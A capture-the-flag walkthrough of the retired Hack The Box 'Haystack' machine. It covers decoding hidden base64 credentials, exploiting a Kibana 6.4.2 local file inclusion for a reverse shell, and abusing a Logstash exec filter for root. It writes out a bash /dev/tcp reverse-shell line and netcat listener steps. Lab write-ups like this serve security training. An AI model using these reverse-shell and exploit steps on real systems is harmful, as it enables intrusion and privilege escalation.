Today, we’re
sharing another Hack Challenge Walkthrough box: Haystack design by JoyDragon
and the machine is part of the retired lab, so you can connect to the machine
using your HTB VPN and then start to solve the CTF.
The level of the
Lab is set: Beginner to intermediate.
Task: Capture the
user.txt and root.txt flags.
Penetration Testing
Base64 decode
Initial Foothold
SSH login
LFI on Kibana
Privilege Escalation
Abusing Execution function
Network Scanning
Since we know the
victim's computer IP, we can begin with Nmap scanning to identify the open
ports and services that run across it.
nmap -A
From this scanning
test, we found port 80 & 9200 open to HTTP, and port 22 open to SSH as well.
Moreover I find the HTTP method: DELETE is allow for nginx server at port 9200.
as we know enumeration is important, we
search for port 80 and have found a picture on the web page. I download the
image to test the metadata in the hope that the author might have concealed
some hint inside the file.
Hmmmm! So, I found the bas64 code “bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==”
through metadata extraction with the help of “string” command which is a Linux
strings needle.jpg
Then decode the above extracted code with
the help echo command:
echo “bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==”
|base64 -d
By decoding the encoded text of base64 I
got a text that was in Spanish. I found the original text "the needle in
the haystack is key with the help of google translator.
Then we navigate to port 9200 and found it
was elasticsearch as shown in the image.
According to its official description:
Elasticsearch is the central component of the Elastic Stack, a set of open
source tools for data ingestion, enrichment, storage, analysis, and
visualization. Commonly referred to as the ELK Stack (after Elasticsearch,
Logstash, and Kibana).
Then I explore more about this and found link
that teaches an interesting technique to search for query and then search for
clave that we have mentioned as "clave," implying "key," so
I found two messages that were piped with base 64 encoded text in the Spanish
So, I translated the Spanish text message:
“Tengo que guardar la clave para la maquina” = “I have to save the password for
the machine”
Further I decode the message “dXNlcjogc2VjdXJpdHkg”
and found username “user: security”
echo “dXNlcjogc2VjdXJpdHkg” | base64 -d
Similarly, I translated another text
message “Esta clave no se puede perder, la guardo aca= “key cannot be lost, I
keep it here”.
And then again decoded the base64 value
which gave the password: “pass:” for the username
enumerated above.
echo “cGFzczogc3BhbmlzaC5pcy5rZXk” | base64
Initial Foothold
Now it was time to connect via ssh with the
host machine, using the credentials mentioned above.
ssh security@
Finally! we got the shell of the host
machine shell and obtain the user.txt flag. Further we check /etc/passwd file
and note the record given for user “kibana”.
Then we checked for process run by kibana
and found another service running over port 5601 on a localhost.
aux | grep kibana
We use curl for exploring the service
running on localhost via port 5061 and luckily found the installed version 6.4.2
of the kibana.
Exploiting Kibana
Hmmm! So, it was time hunt for its exploit
if available on the internet. Fruitfully we got an exploit from github and according to this
exploit a Local File Inclusion on Kibana found by CyberArk Labs, the LFI can be
used to execute a reverse shell on the Kibana server.
So, I just download the exploit code to my
local machine and change the "attacker's Address" as shown in the
image and save the file with the name "raj.js" It was time to
transfer the exploit to the host machine and start the netcat listener that
receives the host machine's reverse connection.
Now it was time to inject the payload on
the vulnerable application, thus we downloaded the exploit “raj.js” into /tmp
directory of the host machine.
curl -O
Soon you will get the reverse connection of
the host machine via netcat session as shown in the below image.
python -c ‘import pty;pty.spawn(“/bin/bash”)’
So, it was time to escalate privilege for
user kibana and for this, we enumerate the proc running under kibana group with
the help of find command.
find / -group kibana 2>/dev/null |
grep -v proc
We found some three interesting .conf file:
filter.conf, input.conf, output.conf at /etc/logstash.
Privilege Escalation
It was time to examine the file we found,
so I investigate each file and conclude from each file the following remarks:
This file is used to filter commands given by the execute function to print a
message for the given command that will be executing.
Input.conf: Bundle
the file which is by giving name as “/opt/kibana/logstash_*”
This will run execute function for the given command.
Thus, we run following command to get the
reverse connection of the machine by saving the input in a file name as “logstash_raj”
and wait for 10 sec to get the reverse connection on a new netcat listener.
echo "Ejecutar comando: bash -c
'bash -i >& /dev/tcp/ 0>&1'" >
Boom!! And after waiting for 10 sec we got the
root privilege shell where we found our root flag.
cd /root
cat root.txt
I considered this to be a fascinating VM,
where I learned a method of abusing "elasticsearch" and Kibana to
escalate the shell of root privilege.
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